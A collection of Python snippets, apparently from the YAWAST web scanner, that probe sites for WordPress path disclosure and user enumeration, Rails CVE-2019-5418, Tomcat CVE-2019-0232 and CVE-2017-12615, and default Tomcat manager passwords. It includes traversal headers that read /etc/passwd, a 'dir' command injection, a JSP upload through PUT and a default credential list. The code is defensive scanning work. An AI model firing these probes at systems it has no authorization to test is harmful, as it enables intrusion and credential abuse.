예제 #1
0
def check_path_disclosure(wp_url: str) -> List[Result]:
    """Check a WordPress install for plugin files that disclose the server path.

    Directly requests plugin files known to throw a PHP fatal error when
    loaded outside of WordPress; the error message embeds the absolute
    filesystem path of the file, disclosing the install location.

    :param wp_url: base URL of the WordPress install
    :return: list of Result findings
    """
    # this is a list of files that are known to throw a fatal error when accessed directly
    # this is from a manual review of all plugins with at least 1M installs
    urls = [
        "wp-content/plugins/hello.php",
        "wp-content/plugins/akismet/akismet.php",
        "wp-content/plugins/contact-form-7/includes/capabilities.php",
        "wp-content/plugins/wordpress-seo/admin/views/partial-alerts-errors.php",
        "wp-content/plugins/jetpack/load-jetpack.php",
        "wp-content/plugins/jetpack/uninstall.php",
        "wp-content/plugins/duplicate-post/duplicate-post-admin.php",
        "wp-content/plugins/wpforms-lite/includes/admin/class-welcome.php",
        "wp-content/plugins/wp-google-maps/base/includes/welcome.php",
        "wp-content/plugins/wp-super-cache/wp-cache.php",
        "wp-content/plugins/mailchimp-for-wp/integrations/wpforms/bootstrap.php",
        "wp-content/plugins/mailchimp-for-wp/integrations/bootstrap.php",
        "wp-content/plugins/regenerate-thumbnails/regenerate-thumbnails.php",
        "wp-content/plugins/advanced-custom-fields/includes/deprecated.php",
        "wp-content/plugins/redirection/redirection.php",
        "wp-content/plugins/wpforms-lite/includes/admin/importers/class-ninja-forms.php",
        "wp-content/plugins/ninja-forms/includes/deprecated.php",
        "wp-content/plugins/so-widgets-bundle/so-widgets-bundle.php",
        "wp-content/plugins/wp-fastest-cache/templates/preload.php",
        "wp-content/plugins/duplicate-page/duplicatepage.php",
        "wp-content/plugins/better-wp-security/better-wp-security.php",
        "wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php",
        "wp-content/plugins/related-posts/views/settings.php",
        "wp-content/plugins/wpcontentguard/views/settings.php",
        "wp-content/plugins/simple-social-icons/simple-social-icons.php",
    ]
    results: List[Result] = []

    # matches an absolute *nix ("/...") or Windows ("C:\...") path ending in
    # ".php" inside the <b>...</b> of a PHP fatal error message.
    # BUG FIX: the original pattern used an unescaped "." before "php" (matched
    # any character) and a greedy ".*" that could span multiple "</b>" tags.
    path_pattern = re.compile(r"<b>((?:/|[A-Z]:\\).*?\.php)</b>")

    for url in urls:
        target = urljoin(wp_url, url)

        head = network.http_head(target, False)
        if head.status_code != 404:
            resp = network.http_get(target, False)

            if resp.status_code < 300 or resp.status_code >= 500:
                # we have some kind of response that could be useful
                if "<b>Fatal error</b>:" in resp.text:
                    # we have an error - try to pull the disclosed path out of it
                    # (single search instead of the original search + findall pair)
                    match = path_pattern.search(resp.text)
                    if match:
                        try:
                            path = match.group(1)
                            results.append(
                                Result.from_evidence(
                                    Evidence.from_response(
                                        resp, {"path": path}),
                                    f"WordPress File Path Disclosure: {target} ({path})",
                                    Vulnerabilities.
                                    APP_WORDPRESS_PATH_DISCLOSURE,
                                ))
                        except Exception:
                            output.debug_exception()

            results += response_scanner.check_response(target, resp)

    return results
예제 #2
0
def check_cve_2019_5418(url: str) -> List[Result]:
    """Check for Rails CVE-2019-5418 (file content disclosure).

    Sends a crafted ``Accept`` header containing a path-traversal payload; a
    vulnerable Rails controller renders ``/etc/passwd``, which is detected by
    finding the root account entry in the response body.

    :param url: the URL to check - must end with "/" (controller path)
    :return: list of Result findings (empty if skipped or not vulnerable)
    """
    global _checked

    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/") or url in _checked:
        return []

    results: List[Result] = []
    _checked.append(url)

    try:
        res = network.http_get(
            url, False, {"Accept": "../../../../../../../../../e*c/p*sswd{{"}
        )
        body = res.text
        req = network.http_build_raw_request(res.request)

        results += response_scanner.check_response(url, res)

        # match the root entry of /etc/passwd. BUG FIX: the password field may
        # be "x", "*", "!" or empty, so accept anything that isn't a separator
        # (the original "[a-zA-Z0-9]+" missed those); re.MULTILINE is needed so
        # "$" matches at the end of the passwd line even when more content
        # follows in the response body.
        pattern = r"root:[^:\r\n]*:0:0:.+$"
        mtch = re.search(pattern, body, re.MULTILINE)

        if mtch:
            results.append(
                Result(
                    f"Rails CVE-2019-5418: File Content Disclosure: {url} - {mtch.group(0)}",
                    Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                    url,
                    [body, req],
                )
            )
    except Exception:
        output.debug_exception()

    return results
예제 #3
0
def check_cve_2019_0232(links: List[str]) -> List[Result]:
    """Check CGI links for Apache Tomcat CVE-2019-0232 (Windows CGI RCE).

    Appends a ``dir`` command to every cgi-bin link and looks for a Windows
    directory listing in the response.

    :param links: candidate URLs gathered from the site
    :return: list of Result findings
    """
    results: List[Result] = []

    # build one probe per cgi-bin link, appending the command as a query arg
    targets = [
        f"{link}&dir" if "?" in link else f"{link}?dir"
        for link in links
        if "cgi-bin" in link
    ]

    for target in targets:
        res = network.http_get(target, False)

        # a "<DIR>" marker in the body means the dir command actually ran
        if "<DIR>" in res.text:
            results.append(
                Result(
                    f"Apache Tomcat RCE (CVE-2019-0232): {target}",
                    Vulnerabilities.SERVER_TOMCAT_CVE_2019_0232,
                    target,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                )
            )

        results += response_scanner.check_response(target, res)

    return results
예제 #4
0
def check_json_user_enum(url: str) -> List[Result]:
    """Check the WP-JSON users endpoint for user enumeration.

    :param url: base URL of the WordPress install
    :return: list of Result findings (one for the endpoint, one per user)
    """
    results: List[Result] = []
    target = urljoin(url, "wp-json/wp/v2/users")

    res = network.http_get(target, False)

    # a non-2xx status, or a body without "slug", means the endpoint is closed
    if res.status_code >= 300 or "slug" not in res.text:
        return results

    # log the enum finding
    results.append(
        Result.from_evidence(
            Evidence.from_response(res),
            f"WordPress WP-JSON User Enumeration at {target}",
            Vulnerabilities.APP_WORDPRESS_USER_ENUM_API,
        ))

    # log the individual users exposed by the endpoint
    for user in res.json():
        results.append(
            Result.from_evidence(
                Evidence.from_response(
                    res,
                    {
                        "user_id": user["id"],
                        "user_slug": user["slug"],
                        "user_name": user["name"],
                    },
                ),
                f"ID: {user['id']}\tUser Slug: '{user['slug']}'\t\tUser Name: '{user['name']}'",
                Vulnerabilities.APP_WORDPRESS_USER_FOUND,
            ))

    return results
예제 #5
0
File: file_search.py — Project: sgnls/yawast
def _check_url(urls: List[str], queue, follow_redirections, recursive) -> None:
    """Probe each URL for existing files, reporting findings via *queue*.

    Issues a HEAD first; on a 2xx, scans the full GET response and (when
    *recursive*) descends into the directory. On a 3xx, optionally follows
    the Location header. Results are delivered as a ``(files, results)``
    tuple on *queue* - this function returns nothing directly.

    :param urls: URLs to check
    :param queue: queue receiving the (files, results) tuple
    :param follow_redirections: whether to chase 3xx Location headers
    :param recursive: whether to recurse into found directories
    """
    files: List[str] = []
    results: List[Result] = []

    for url in urls:
        try:
            # get the HEAD first, we only really care about actual files
            res = network.http_head(url, False)

            if res.status_code < 300:
                # run a scan on the full result, so we can ensure that we get any issues
                results += response_scanner.check_response(
                    url, network.http_get(url, False))

                files.append(url)

                if recursive:
                    # BUG FIX: the results variable was previously named "re",
                    # shadowing the re module within this function
                    sub_files, sub_results = find_directories(
                        url, follow_redirections, recursive)

                    files.extend(sub_files)
                    results.extend(sub_results)
            elif res.status_code < 400 and follow_redirections:
                if "Location" in res.headers:
                    _check_url([res.headers["Location"]], queue,
                               follow_redirections, recursive)
        except Exception as error:
            output.debug(f"Error checking URL ({url}): {str(error)}")

    queue.put((files, results))
예제 #6
0
def check_aspnet_handlers(url: str) -> List[Result]:
    """Enumerate ASP.NET handler mappings via their error behavior.

    Requests a random, non-existent file with each handler extension; an
    aspxerrorpath redirect or a .NET exception in an error body indicates
    the handler is mapped.

    :param url: base URL to probe
    :return: list of Result findings
    """
    results = []

    # random name so the file is guaranteed not to exist
    file_name = secrets.token_hex(12)

    exts = ["ashx", "aspx", "asmx", "soap", "rem"]

    for ext in exts:
        target = urljoin(url, f"{file_name}.{ext}")
        vuln = False

        res = network.http_get(target, False)
        body = res.text

        if "Location" in res.headers and "aspxerrorpath" in res.headers["Location"]:
            vuln = True
        elif res.status_code >= 400 and (
            # BUG FIX: without these parentheses, "and" bound tighter than
            # "or", so the last two substring checks ignored the status code
            "Remoting.RemotingException" in body
            or "HttpException" in body
            or "FileNotFoundException" in body
        ):
            vuln = True

        if vuln:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res, {"handler": ext}),
                    f"ASP.NET Handler Enumeration: {ext}",
                    Vulnerabilities.SERVER_ASPNET_HANDLER_ENUM,
                )
            )

    return results
예제 #7
0
File: nginx.py — Project: rurbin3/yawast
def check_status(url: str) -> List[Result]:
    """Look for an exposed Nginx stub_status page.

    :param url: base URL to probe
    :return: list of Result findings
    """
    results: List[Result] = []

    for candidate in ("status/", "stats/"):
        target = urljoin(url, candidate)

        res = network.http_get(target, False)

        # the stub_status module output always starts with this line
        exposed = res.status_code == 200 and "Active connections:" in res.text
        if exposed:
            results.append(
                Result(
                    f"Nginx status page found: {target}",
                    Vulnerabilities.SERVER_NGINX_STATUS_EXPOSED,
                    target,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                ))

        results += response_scanner.check_response(target, res)

    return results
예제 #8
0
File: php.py — Project: rurbin3/yawast
    def _get_resp(url: str, q_count: int) -> Response:
        """Send a PHP PATH_INFO probe with a padded query string.

        Appends an encoded "/PHP\\nindex.php" PATH_INFO suffix to the URL's
        path, then pads the query with "Q" characters, compensating for the
        length the suffix gained during percent-encoding so the request
        length lands where the caller expects.

        :param url: base URL to probe
        :param q_count: requested query padding length before compensation
        """
        path_info = "/PHP\nindex.php"
        parsed = urlparse(url)
        base_path = quote(parsed.path)
        probe_path = quote(parsed.path + path_info)

        # how much longer the suffix became once percent-encoded
        delta = len(probe_path) - len(path_info) - len(base_path)
        pad = int(q_count - delta / 2)

        return network.http_get(urljoin(url, probe_path + "?" + "Q" * pad), False)
예제 #9
0
    def test_response_scanner(self):
        """Scan a live page and verify JavaScript-related findings appear."""
        network.init("", "", "")
        url = "https://adamcaudill.com/"
        resp = network.http_get(url)

        http.reset()
        res = response_scanner.check_response(url, resp)

        messages = [r.message for r in res]
        self.assertTrue(any("External JavaScript File" in m for m in messages))
        self.assertTrue(any("Vulnerable JavaScript" in m for m in messages))
예제 #10
0
def _identify_by_path(url: str, path: str) -> Tuple[Response, Union[str, None]]:
    """Probe a candidate WordPress directory via its login page.

    :param url: base URL of the site
    :param path: candidate directory (relative to *url*)
    :return: the response, plus the WordPress base URL if identified,
             otherwise None
    """
    target = urljoin(url, f"{path}wp-login.php")

    res = network.http_get(target, False)

    # the stock login page carries this footer text
    if res.status_code == 200 and "Powered by WordPress" in res.text:
        return res, urljoin(url, path)

    return res, None
예제 #11
0
File: jira.py — Project: sgnls/yawast
def check_for_jira(session: Session) -> Tuple[List[Result], Union[str, None]]:
    # this checks for an instance of Jira relative to the session URL
    """Check for a Jira instance at the usual locations under the session URL.

    :param session: the active scan session (provides the base URL)
    :return: (findings, Jira dashboard URL or None if not found)
    """
    results: List[Result] = []
    jira_url = None

    try:
        targets = [
            f"{session.url}secure/Dashboard.jspa",
            f"{session.url}jira/secure/Dashboard.jspa",
        ]

        for target in targets:
            res = network.http_get(target, False)

            found = (
                res.status_code == 200
                and 'name="application-name" content="JIRA"' in res.text
            )

            if found:
                # we have a Jira instance
                jira_url = target

                # try to get the version
                ver_str = "unknown"
                try:
                    ver_pattern = (
                        r"<meta name=\"ajs-version-number\" content=\"([\d\.]+)\">"
                    )
                    version = re.search(ver_pattern, res.text).group(1)

                    build_pattern = (
                        r"<meta name=\"ajs-build-number\" content=\"(\d+)\">"
                    )
                    build = re.search(build_pattern, res.text).group(1)

                    ver_str = f"v{version}-{build}"
                except Exception:
                    # version metadata is optional; fall back to "unknown"
                    output.debug_exception()

                results.append(
                    Result.from_evidence(
                        Evidence.from_response(res),
                        f"Jira Installation Found ({ver_str}): {target}",
                        Vulnerabilities.APP_JIRA_FOUND,
                    )
                )

            results += response_scanner.check_response(target, res)

            if found:
                # BUG FIX: the break was previously unconditional, so only the
                # first target was ever checked; stop only once Jira is found
                break
    except Exception:
        output.debug_exception()

    return results, jira_url
예제 #12
0
def scan_endpoint(uri, definitions):
    """
    Given a uri it scans for vulnerability in uri and the content
    hosted at that uri
    """
    # findings from the URI itself, then from the content it serves
    findings = scan_uri(uri, definitions)

    body = network.http_get(uri, False).text
    findings.extend(scan_file_content(body, definitions))

    return findings
예제 #13
0
def _get_data() -> None:
    """Fetch the Burp Suite error-message match rules and append them to _data."""
    global _data
    data_url = "https://raw.githubusercontent.com/augustd/burp-suite-error-message-checks/master/src/main/resources/burp/match-rules.tab"

    try:
        raw = network.http_get(data_url).text

        # one tab-separated match rule per line
        _data.extend(_MatchRule(line) for line in raw.splitlines())
    except Exception as error:
        output.debug(f"Failed to get version data: {error}")
        output.debug_exception()
예제 #14
0
def _check_version_404(url: str) -> List[Result]:
    """Request a random .jsp path and mine the resulting error page for a version.

    :param url: base URL to probe
    :return: list of Result findings
    """
    results: List[Result] = []

    # random file name, so we are all but guaranteed to get an error page
    target = urljoin(url, f"{secrets.token_hex(12)}.jsp")

    res = network.http_get(target, False)

    if res.status_code > 400:
        results += get_version(target, res, "404 Error Message")

    return results
예제 #15
0
    def test_net_init_invalid_header(self):
        """network.init with a malformed header string must log an error, not raise.

        NOTE(review): the ``assertIsNone(error)`` in the except branch can
        never pass when an exception is caught - it serves as a fail-fast
        that surfaces any unexpected exception as a test failure.
        """
        try:
            output.setup(False, True, True)
            with utils.capture_sys_output() as (stdout, stderr):
                # "AUTH123" lacks the NAME=VALUE form, triggering the error path
                network.init("", "", "AUTH123")

                _ = network.http_get("http://example.com")
        except Exception as error:
            self.assertIsNone(error)

        # stdout/stderr stay bound after the "with" block exits (Python has
        # function scope, not block scope), so they can be inspected here
        self.assertIsNotNone(network._requester)
        self.assertNotIn("Exception", stderr.getvalue())
        self.assertIn("Error", stdout.getvalue())
        self.assertIn("header must be in NAME=VALUE format", stdout.getvalue())

        # restore global network state for subsequent tests
        network.reset()
예제 #16
0
    def test_net_init_invalid_proxy_ftp(self):
        """network.init with an ftp:// proxy URL must log an error, not raise.

        NOTE(review): the ``assertIsNone(error)`` in the except branch can
        never pass when an exception is caught - it serves as a fail-fast
        that surfaces any unexpected exception as a test failure.
        """
        try:
            output.setup(False, True, True)
            with utils.capture_sys_output() as (stdout, stderr):
                # ftp is not a supported proxy scheme, triggering the error path
                network.init("ftp://127.0.0.1:1234", "", "")

                _ = network.http_get("http://example.com")
        except Exception as error:
            self.assertIsNone(error)

        # stdout/stderr stay bound after the "with" block exits (Python has
        # function scope, not block scope), so they can be inspected here
        self.assertIsNotNone(network._requester)
        self.assertNotIn("Exception", stderr.getvalue())
        self.assertIn("Error", stdout.getvalue())
        self.assertIn("Invalid proxy server specified", stdout.getvalue())

        # restore global network state for subsequent tests
        network.reset()
예제 #17
0
def _get_data() -> None:
    """Download the RetireJS vulnerability repository into the module cache.

    Replaces the repository's version placeholder with a version-matching
    regex before parsing. On failure, ``_data`` is set to None.
    """
    global _data

    data: Union[Dict[Any, Any], None] = None
    data_url = "https://raw.githubusercontent.com/RetireJS/retire.js/master/repository/jsrepository.json"

    try:
        raw_bytes = network.http_get(data_url).content

        # the repo embeds a "§§version§§" placeholder in its regexes;
        # substitute a pattern that matches actual version strings
        raw_js = raw_bytes.decode("utf-8").replace(
            "§§version§§", "[0-9][0-9.a-z_\\\\-]+"
        )

        data = json.loads(raw_js)
    except Exception as error:
        output.debug(f"Failed to get version data: {error}")
        output.debug_exception()

    # NOTE(review): a failed fetch resets _data to None, clobbering any
    # previously loaded data - this mirrors the original behavior
    _data = data
예제 #18
0
def check_cve_2017_12615(url: str) -> List[Result]:
    """Check for Apache Tomcat CVE-2017-12615 (PUT-based JSP upload RCE).

    Uploads a JSP via PUT using the trailing-slash bypass, then fetches the
    file and looks for the random marker the JSP should print.

    :param url: base URL to probe
    :return: list of Result findings
    """
    results = []

    try:
        file_name = secrets.token_hex(12)
        check_value = secrets.token_hex(12)

        # trailing "/" is the CVE-2017-12615 bypass for the JSP servlet
        target = urljoin(url, f"{file_name}.jsp/")

        # BUG FIX: the marker must be a quoted Java string literal - unquoted,
        # out.println({check_value}) is not valid Java and the page would fail
        # to compile instead of printing the marker
        res_put = network.http_put(
            target, f'<% out.println("{check_value}");%>', False)

        if res_put.status_code < 300:
            # code should be 2xx for this to work
            # now we need to check to see if it worked
            created_file = urljoin(url, f"{file_name}.jsp")

            res_get = network.http_get(created_file, False)

            if check_value in res_get.text:
                # we have RCE
                results.append(
                    Result(
                        f"Apache Tomcat PUT RCE (CVE-2017-12615): {created_file}",
                        Vulnerabilities.SERVER_TOMCAT_CVE_2017_12615,
                        url,
                        [
                            network.http_build_raw_request(res_put.request),
                            network.http_build_raw_response(res_put),
                            network.http_build_raw_request(res_get.request),
                            network.http_build_raw_response(res_get),
                        ],
                    ))
            else:
                results += response_scanner.check_response(
                    created_file, res_get)
        else:
            # if we didn't get a hit, go ahead and scan it to see if there's
            #  anything else that we should be picking up.
            results += response_scanner.check_response(target, res_put)
    except Exception:
        output.debug_exception()

    return results
예제 #19
0
def check_struts_sample(url: str) -> List[Result]:
    """Look for Struts sample/showcase applications left deployed.

    :param url: base URL to probe
    :return: list of Result findings
    """
    results: List[Result] = []

    try:
        # make sure we have real 404s
        file_good, _, _, _ = network.check_404_response(url)
        if not file_good:
            return results

        sample_paths = (
            "Struts2XMLHelloWorld/User/home.action",
            "struts2-showcase/showcase.action",
            "struts2-showcase/titles/index.action",
            "struts2-bootstrap-showcase/",
            "struts2-showcase/index.action",
            "struts2-bootstrap-showcase/index.action",
            "struts2-rest-showcase/",
        )

        for sample in sample_paths:
            target = urljoin(url, sample)

            res = network.http_get(target, False)

            # check for other issues
            results += response_scanner.check_response(target, res)

            if res.status_code == 200:
                results.append(
                    Result(
                        f"Struts Sample Found: {target}",
                        Vulnerabilities.SERVER_TOMCAT_STRUTS_SAMPLE,
                        target,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )
    except Exception:
        output.debug_exception()

    return results
예제 #20
0
def check_manager_password(url: str) -> List[Result]:
    """Try a list of default credentials against the Tomcat Manager.

    :param url: URL of the manager application
    :return: list of Result findings
    """
    results = []

    try:
        creds = [
            b"tomcat:tomcat",
            b"tomcat:password",
            b"tomcat:",
            b"admin:admin",
            b"admin:password",
            b"admin:",
        ]

        for cred in creds:
            ce = base64.b64encode(cred)

            # BUG FIX: the Authorization header requires the "Basic " scheme
            # prefix (RFC 7617) and a str value - the raw base64 bytes alone
            # would never authenticate
            res = network.http_get(
                url, False, {"Authorization": f"Basic {ce.decode('utf-8')}"}
            )
            body = res.text

            if (
                '<font size="+2">Tomcat Web Application Manager</font>' in body
                or '<font size="+2">Tomcat Virtual Host Manager</font>' in body
            ):
                # we got in
                results.append(
                    Result(
                        f"Apache Tomcat Weak Manager Password: '******' - {url}",
                        Vulnerabilities.SERVER_TOMCAT_MANAGER_WEAK_PASSWORD,
                        url,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )
            else:
                # if we didn't get a hit, go ahead and scan it to see if there's
                #  anything else that we should be picking up.
                results += response_scanner.check_response(url, res)
    except Exception:
        output.debug_exception()

    return results
예제 #21
0
def check_telerik_rau_enabled(soup: BeautifulSoup, url: str) -> List[Result]:
    """Check whether the Telerik RadAsyncUpload (RAU) handler is enabled.

    Scans the page's script tags for Telerik.Web.UI.WebResource.axd, then
    probes the handler with ?type=rau and looks for the registration message
    (relevant to CVE-2019-18935).

    :param soup: parsed HTML of the page fetched from *url*
    :param url: the URL the page was fetched from
    :return: list of Result findings
    """
    results: List[Result] = []

    parsed = urlparse(url)
    domain = utils.get_domain(parsed.netloc)

    try:
        # get all the scripts
        files = [i.get("src") for i in soup.find_all("script") if i.get("src")]

        for file in files:
            if "Telerik.Web.UI.WebResource.axd" in file:
                # ok, they are using Telerik UI for ASP.NET AJAX
                # fix-up the URL
                if str(file).startswith("//"):
                    file = f"https:{file}"
                if str(file).startswith("/") or (not str(file).startswith("http")):
                    if parsed.scheme == "https":
                        file = urljoin(f"https://{domain}", file)
                    else:
                        file = urljoin(f"http://{domain}", file)

                target = urlparse(file)
                target = target._replace(query="type=rau")

                # BUG FIX: "domain in target" tested tuple membership against
                # the ParseResult's components (exact equality only, and never
                # matching a netloc that carries a port); check the netloc
                # substring instead
                if domain in target.netloc:
                    res = network.http_get(urlunparse(target), False)
                    # NOTE: Typo in "succesfully" is intentional - do not fix
                    if "RadAsyncUpload handler is registered succesfully" in res.text:
                        results.append(
                            Result.from_evidence(
                                Evidence.from_response(res, {"original_url": url}),
                                f"Telerik UI for ASP.NET AJAX RadAsyncUpload Enabled "
                                f"(Check for CVE-2019-18935) at {target}",
                                Vulnerabilities.APP_TELERIK_UI_RAD_ASYNC_UPLOAD_ENABLED,
                            )
                        )

                        break
    except Exception:
        output.debug_exception()

    return results
예제 #22
0
def check_server_status(url: str) -> List[Result]:
    """Look for an exposed Apache HTTPD mod_status page.

    :param url: base URL to probe
    :return: list of Result findings
    """
    results: List[Result] = []

    target = urljoin(url, "server-status/")

    res = network.http_get(target, False)

    # the mod_status page always carries this title text
    if "Apache Server Status" in res.text:
        results.append(
            Result(
                f"Apache HTTPD Server Status found: {target}",
                Vulnerabilities.SERVER_APACHE_STATUS,
                url,
                res.text,
            ))

    results += response_scanner.check_response(url, res)

    return results
예제 #23
0
def check_jira_user_registration(jira_url: str) -> List[Result]:
    """Check whether the Jira instance allows public user sign-up.

    :param jira_url: URL of the Jira dashboard previously discovered
    :return: list of Result findings
    """
    results: List[Result] = []

    try:
        # swap the last path segment of the dashboard URL for the signup page
        base = jira_url.rsplit('/', 1)[0]
        target = f"{base}/Signup!default.jspa"

        res = network.http_get(target, False)

        signup_open = (
            res.status_code == 200 and "<title>Sign up for Jira" in res.text
        )
        if signup_open:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"Jira User Registration Enabled: {target}",
                    Vulnerabilities.APP_JIRA_USER_REG_ENABLED,
                ))

        results += response_scanner.check_response(target, res)
    except Exception:
        output.debug_exception()

    return results
예제 #24
0
def _check_url(url: str, targets: List[str]) -> Tuple[List[str], List[Result]]:
    """Probe a list of special-file paths relative to *url*.

    :param url: base URL
    :param targets: relative paths to check
    :return: (URLs of files found, list of Result findings)
    """
    files: List[str] = []
    results: List[Result] = []

    for relative in targets:
        candidate = urljoin(url, relative)

        res = network.http_get(candidate, False)

        results += response_scanner.check_response(candidate, res)

        # any 2xx counts as the file existing
        if res.status_code < 300:
            files.append(candidate)
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"File found: {candidate}",
                    Vulnerabilities.SERVER_SPECIAL_FILE_EXPOSED,
                ))

    return files, results
예제 #25
0
def check_manager(url: str) -> List[Result]:
    """Look for exposed Tomcat Manager / Host Manager applications.

    :param url: base URL to probe
    :return: list of Result findings
    """
    results: List[Result] = []

    try:
        for base in (urljoin(url, "manager/"), urljoin(url, "host-manager/")):
            # check for both Tomcat 6, and 7+
            for path in (urljoin(base, "html/"), base):
                res = network.http_get(path, False)

                if "<tt>conf/tomcat-users.xml</tt>" not in res.text:
                    # if we didn't get a hit, go ahead and scan it to see if there's
                    #  anything else that we should be picking up.
                    results += response_scanner.check_response(path, res)
                    continue

                # we have a finding
                vuln = (
                    Vulnerabilities.SERVER_TOMCAT_HOST_MANAGER_EXPOSED
                    if "host-manager" in path
                    else Vulnerabilities.SERVER_TOMCAT_MANAGER_EXPOSED
                )

                results.append(
                    Result(
                        f"Apache Tomcat Manager found: {path}",
                        vuln,
                        path,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )

                # check to see if we can get in with a default password
                results += check_manager_password(url)
    except Exception:
        output.debug_exception()

    return results
예제 #26
0
File: rails.py — Project: sasqwatch/yawast
def check_cve_2019_5418(url: str) -> List[Result]:
    """Check for Rails CVE-2019-5418 (file content disclosure).

    :param url: the URL to check - must end with "/" (controller path)
    :return: list of Result findings (empty if the URL is not a controller)
    """
    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/"):
        return []

    results: List[Result] = []

    res = network.http_get(
        url, False, {"Accept": "../../../../../../../../../etc/passwd{{"})
    raw_request = network.http_build_raw_request(res.request)

    results += response_scanner.check_response(url, res)

    # a root account entry means /etc/passwd was rendered
    if "root:" in res.text:
        results.append(
            Result(
                f"Rails CVE-2019-5418: File Content Disclosure: {url}",
                Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                url,
                [res.text, raw_request],
            ))

    return results
예제 #27
0
File: file_search.py — Project: sgnls/yawast
 def _get_resp(url: str) -> Response:
     """Thin wrapper: issue a GET for *url* through the shared network module."""
     resp = network.http_get(url, False)
     return resp
예제 #28
0
def _get_links(base_url: str, urls: List[str], queue, pool):
    """Spider worker: fetch *urls*, collect in-scope links, and scan responses.

    Appends discovered links to the shared ``_links`` list (guarded by
    ``_lock``), records secure-to-insecure links in ``_insecure``, and
    schedules follow-up crawls on *pool*, tracking the async handles in
    ``_tasks``. Findings are delivered via ``queue.put(results)`` - nothing
    is returned directly.

    :param base_url: scope root; only links containing it are followed
    :param urls: batch of URLs to fetch in this task
    :param queue: queue receiving the list of Result findings
    :param pool: worker pool used to schedule recursive _get_links calls
    """
    global _links, _insecure, _tasks, _lock

    # don't parse response bodies larger than this
    max_length = 1024 * 1024 * 3  # 3MB

    results: List[Result] = []

    # fail-safe to make sure we don't go too crazy
    if len(_links) > 10000:
        # if we have more than 10,000 URLs in our list, just stop
        output.debug(
            "Spider: Link list contains > 10,000 items. Stopped gathering more links."
        )

        return

    for url in urls:
        try:
            # list of pages found that will need to be processed
            to_process: List[str] = []

            res = network.http_get(url, False)

            # get the length, so that we don't parse huge documents
            if "Content-Length" in res.headers:
                length = int(res.headers["Content-Length"])
            else:
                length = len(res.content)

            if http_utils.is_text(res) and length < max_length:
                soup = BeautifulSoup(res.text, "html.parser")
            else:
                # no clue what this is
                soup = None

            # soup may be None; check_response is expected to handle that
            results += response_scanner.check_response(url, res, soup)

            if soup is not None:
                for link in soup.find_all("a"):
                    href = link.get("href")

                    # resolve root-relative links ("/path"), but leave
                    # protocol-relative ones ("//host/path") untouched
                    if str(href).startswith(
                            "/") and not str(href).startswith("//"):
                        href = urljoin(base_url, href)

                    if href is not None:
                        # check to see if this link is in scope
                        if base_url in href and href not in _links:
                            # extract the file extension, if the last path
                            # segment has one, to filter binary content
                            if "." in href.split("/")[-1]:
                                file_ext = href.split("/")[-1].split(".")[-1]
                            else:
                                file_ext = None

                            with _lock:
                                _links.append(href)

                            # filter out some of the obvious binary files
                            if file_ext is None or file_ext not in [
                                    "gzip",
                                    "jpg",
                                    "jpeg",
                                    "gif",
                                    "woff",
                                    "zip",
                                    "exe",
                                    "gz",
                                    "pdf",
                            ]:
                                # skip links whose text suggests a destructive
                                # action (e.g. logout/delete) - see _is_unsafe_link
                                if not _is_unsafe_link(href, link.string):
                                    to_process.append(href)
                                else:
                                    output.debug(
                                        f"Skipping unsafe URL: {link.string} - {href}"
                                    )
                            else:
                                output.debug(
                                    f'Skipping URL "{href}" due to file extension "{file_ext}"'
                                )
                        else:
                            # out-of-scope or already-seen link: still flag
                            # https -> http downgrades we haven't reported yet
                            if (base_url.startswith("https://")
                                    and str(href).startswith("http://")
                                    and str(href) not in _insecure):
                                # link from secure to insecure
                                with _lock:
                                    _insecure.append(str(href))

                                results.append(
                                    Result.from_evidence(
                                        Evidence.from_response(
                                            res, {"link": href}),
                                        f"Insecure Link: {url} links to {href}",
                                        Vulnerabilities.HTTP_INSECURE_LINK,
                                    ))

            # handle redirects
            if "Location" in res.headers:
                redirect = res.headers["Location"]

                # check for relative link
                if str(redirect).startswith("/"):
                    redirect = urljoin(base_url, redirect)

                # make sure that we aren't redirected out of scope
                if base_url in redirect:
                    to_process.append(redirect)

            if len(to_process) > 0:
                # schedule the next crawl batch asynchronously; keep the
                # handle so the caller can wait on outstanding tasks
                asy = pool.apply_async(_get_links,
                                       (base_url, to_process, queue, pool))

                with _lock:
                    _tasks.append(asy)
        except Exception:
            output.debug_exception()

    output.debug(f"GetLinks Task Completed - {len(results)} issues found.")
    queue.put(results)